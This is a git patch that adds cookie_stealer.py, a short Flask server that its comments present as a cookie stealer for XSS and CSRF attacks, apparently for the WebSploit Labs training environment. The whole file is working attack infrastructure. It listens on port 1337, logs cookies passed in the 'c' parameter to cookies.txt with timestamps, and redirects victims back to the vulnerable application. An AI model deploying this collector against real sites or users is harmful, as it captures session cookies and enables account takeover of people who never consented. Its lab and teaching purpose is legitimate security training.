From 923c66f672cce411d174696beb966aaa0abd7cd3 Mon Sep 17 00:00:00 2001
From: Omar Santos <santosomar@gmail.com>
Date: Sat, 27 Mar 2021 12:41:24 -0400
Subject: [PATCH] Create cookie_stealer.py

---
 python_ruby_and_bash/cookie_stealer.py | 31 ++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 python_ruby_and_bash/cookie_stealer.py

diff --git a/python_ruby_and_bash/cookie_stealer.py b/python_ruby_and_bash/cookie_stealer.py
new file mode 100644
index 0000000..421ede9
--- /dev/null
+++ b/python_ruby_and_bash/cookie_stealer.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python3
+# This is a fairly basic Flask app / script to steal cookies 
+# It can be used as a cookie-stealer for XSS and CSRF attacks
+# This is available by default in WebSploit Labs (websploit.org)
+# Make sure that you have flask, requests, and redirect installed
+# pip3 install flask, requests, redirect
+
+from flask import Flask, request, redirect
+from datetime import datetime
+
+# Creating the instance for the Flask app
+app = Flask(__name__)
+
+#The following is the root directory of our web app
+@app.route('/')
+
+#Let's now create a function to steal the cookie and write it to a file "cookies.txt"
+def cookie():
+
+    cookie = request.args.get('c')
+    f = open("cookies.txt","a")
+    f.write(cookie + ' ' + str(datetime.now()) + '\n')
+    f.close()
+
+    # redirecting the user back to the vulnerable application
+    # change the URL to whatever application you are leveraging
+    return redirect("http://127.0.0.1:8883")
+
+# you can change the port below to whatever you want to listen it
+if __name__ == "__main__":
+    app.run(host = '0.0.0.0', port=1337)